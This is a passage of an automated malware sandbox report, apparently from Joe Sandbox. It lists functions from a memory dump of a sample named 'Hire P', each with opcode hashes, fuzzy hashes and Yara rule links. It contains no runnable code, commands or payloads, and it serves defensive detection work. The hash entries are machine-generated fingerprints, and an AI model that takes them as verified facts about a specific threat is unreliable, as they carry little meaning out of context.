                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                            • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                                            • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                            • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                                            Function 01102BA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                            • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                            • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                            • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                            Function 01102BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                            • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                            • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                            • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                            Function 01102BE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                            • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                            • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                            • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                            Function 01102AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                            • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                            • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                            • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                            Function 01102AD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                            • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                            • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                            • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                            Function 01102AF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                            • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                            • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                            • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                            Function 01102D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                            • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                            • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                            • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                            Function 01102D00 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                            • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                            • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                            • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                            Function 01102D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                            • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                            • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                            • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                            Function 01102DB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                            • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                                            • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                            • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                            Function 01102DD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                            • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                            • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                            • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                            Function 01102C60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                            • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                            • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                            • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                            Function 01102CA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                            • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                            • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                            • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                            Function 01102CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                            • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                            • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                            • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                            Function 01102CF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                            • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                            • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                            • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                                            Function 01102F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                            • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                            • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                            • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                            Function 01102F60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                            • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                                            • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                            • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                                            Function 01102F90 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                            • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                            • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                            • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                            Function 01102FB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                            • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                            • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                            • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                            Function 01102FA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                            • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                                            • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                            • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                                            Function 01102FE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                            • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                            • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                            • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                            Function 01102E30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                            • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                                            • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                            • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                                            Function 01102E80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                            • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                            • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                            • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                            Function 01102EA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                            • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                            • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                            • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                            Function 01102EE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                            • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                                            • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                            • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                                            Function 01103010 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                            • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                                            • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                            • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                                            Function 01103090 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                            • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                                            • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                            • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                                            Function 011039B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                            • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                            • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                            • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                            Function 01103D10 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                            • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                            • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                            • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                            Function 01103D70 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                            • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                            • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                            • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                            Function 01102C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Function 01102890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                            • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                            • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                            • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
